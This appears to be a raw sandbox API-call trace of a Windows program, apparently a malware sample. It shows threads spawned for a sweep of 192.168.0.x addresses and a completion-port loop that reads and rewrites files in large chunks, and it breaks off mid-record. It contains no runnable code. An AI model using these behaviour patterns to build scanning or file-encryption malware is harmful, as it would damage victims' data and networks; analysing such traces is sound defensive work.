0x6e0 [0158.339] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x2400a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6e4 [0158.339] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x2500a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6e8 [0158.340] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x2600a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6ec [0158.341] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x2700a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6f0 [0158.342] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x2800a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6f4 [0158.342] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x2900a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6f8 [0158.343] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x2a00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6fc [0158.344] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x2b00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x700 [0158.345] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x2c00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x704 [0158.346] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x2d00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x708 [0158.346] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x2e00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x70c [0158.347] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x2f00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x710 [0158.348] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x3000a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x714 [0158.349] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x3100a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x718 [0158.349] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x3200a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x71c [0158.350] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x3300a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x720 [0158.350] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x3400a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x724 [0158.351] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x3500a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x728 [0158.352] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x3600a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x72c [0158.353] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x3700a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x730 [0158.353] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x3800a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x734 [0158.354] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x3900a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x738 [0158.355] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x3a00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x73c [0158.356] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x3b00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x740 [0158.356] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x3c00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x744 [0158.357] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x3d00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x748 [0158.357] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x3e00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x74c [0158.358] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x3f00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x750 [0158.359] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x4000a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x754 [0158.359] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x4100a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x758 [0158.360] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x4200a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x75c [0158.361] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x4300a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x760 [0158.362] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x4400a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x764 [0158.362] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x4500a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x768 [0158.363] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x4600a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x76c [0158.364] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x4700a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x770 [0158.364] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x4800a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x774 [0158.365] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x4900a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x778 [0158.366] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x4a00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x77c [0158.366] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x4b00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x780 [0158.367] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x4c00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x784 [0158.368] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x4d00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x788 [0158.368] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x4e00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x78c [0158.369] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x4f00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x790 [0158.372] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x5000a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x794 [0158.373] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x5100a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x798 [0158.373] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x5200a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x79c [0158.391] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x5300a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x868 [0158.391] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x5400a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x86c [0158.392] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x5500a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x870 [0158.393] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x5600a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x874 [0158.394] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x5700a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x878 [0158.395] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x5800a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x87c [0158.395] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x5900a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x880 [0158.396] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x5a00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x884 [0158.396] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x5b00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x888 [0158.398] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x5c00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x88c [0158.398] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x5d00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x890 [0158.399] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x5e00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x894 [0158.400] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x5f00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x898 [0158.400] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x6000a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x89c [0158.401] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x6100a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x8a0 [0158.402] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x6200a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x8a4 [0158.403] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x6300a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x8a8 [0158.404] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x6400a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x8ac [0158.404] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x6500a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x8b0 [0158.405] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x6600a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x8b4 [0158.406] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x6700a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x8b8 [0158.407] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x6800a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x8bc [0158.407] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x6900a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x8c0 [0158.408] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x6a00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x8c4 [0158.408] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x6b00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x8c8 [0158.409] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x6c00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x8cc [0158.410] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x6d00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x8d0 [0158.411] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x6e00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x8d4 [0158.411] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x6f00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x8d8 [0158.412] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x7000a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x8dc [0158.413] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x7100a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x8e0 [0158.414] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x7200a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x8e4 [0158.415] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x7300a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x8e8 [0158.415] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x7400a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x8ec [0158.416] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x7500a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x8f0 [0158.417] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x7600a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x8f4 [0158.417] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x7700a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x8f8 [0158.418] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x7800a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x8fc [0158.419] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x7900a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x900 [0158.419] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x7a00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x904 [0158.420] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x7c00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x908 [0158.421] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x7d00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x90c [0158.421] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x7e00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x910 [0158.422] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x7f00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x914 [0158.423] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf470dd, lpParameter=0x8000a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x918 [0158.424] WaitForMultipleObjects (nCount=0x40, lpHandles=0xf51048*=0x600, bWaitAll=1, dwMilliseconds=0xffffffff) Thread: id = 2 os_tid = 0x71c Thread: id = 3 os_tid = 0x604 Thread: id = 4 os_tid = 0x490 Thread: id = 5 os_tid = 0x700 Thread: id = 6 os_tid = 0x544 Thread: id = 7 os_tid = 0x484 Thread: id = 8 os_tid = 0x5e0 Thread: id = 24 os_tid = 0x87c Thread: id = 124 os_tid = 0x84c [0136.130] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0147.719] ReadFile (in: hFile=0x61c, lpBuffer=0x4670124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x4670020 | out: lpBuffer=0x4670124, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x4670020) returned 0x0 [0147.719] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0147.721] WriteFile (in: hFile=0x620, lpBuffer=0x4a60124*, nNumberOfBytesToWrite=0xaa48, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4a60020 | out: lpBuffer=0x4a60124*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4a60020) returned 1 [0147.730] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 0 [0147.730] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4790020) returned 1 [0147.730] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 0 [0147.730] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4280020) returned 1 [0147.730] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0147.730] ReadFile (in: hFile=0x624, lpBuffer=0x4820124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x4820020 | out: lpBuffer=0x4820124, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x4820020) returned 0x0 [0147.730] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0147.730] ReadFile (in: hFile=0x628, lpBuffer=0x4940124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x4940020 | out: lpBuffer=0x4940124, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x4940020) returned 0x0 [0147.730] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0147.730] ReadFile (in: hFile=0x620, lpBuffer=0x4a60124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x4a60020 | out: lpBuffer=0x4a60124, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x4a60020) returned 0x0 [0147.730] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0147.730] WriteFile (in: hFile=0x654, lpBuffer=0x4790094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4790020 | out: lpBuffer=0x4790094*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4790020) returned 1 [0147.744] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0147.754] CloseHandle (hObject=0x654) returned 1 [0147.758] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4790020) returned 1 [0147.758] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0147.758] CloseHandle (hObject=0x660) returned 1 [0147.771] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4280020) returned 1 [0147.772] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0147.978] WriteFile (in: hFile=0x628, lpBuffer=0x4280124*, nNumberOfBytesToWrite=0x17a19, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4280020 | out: lpBuffer=0x4280124*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4280020) returned 1 [0148.008] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.011] ReadFile (in: hFile=0x644, lpBuffer=0x4a60124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x4a60020 | out: lpBuffer=0x4a60124*, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x4a60020) returned 1 [0148.011] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.011] ReadFile (in: hFile=0x64c, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x2f30020) returned 0x0 [0148.011] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, 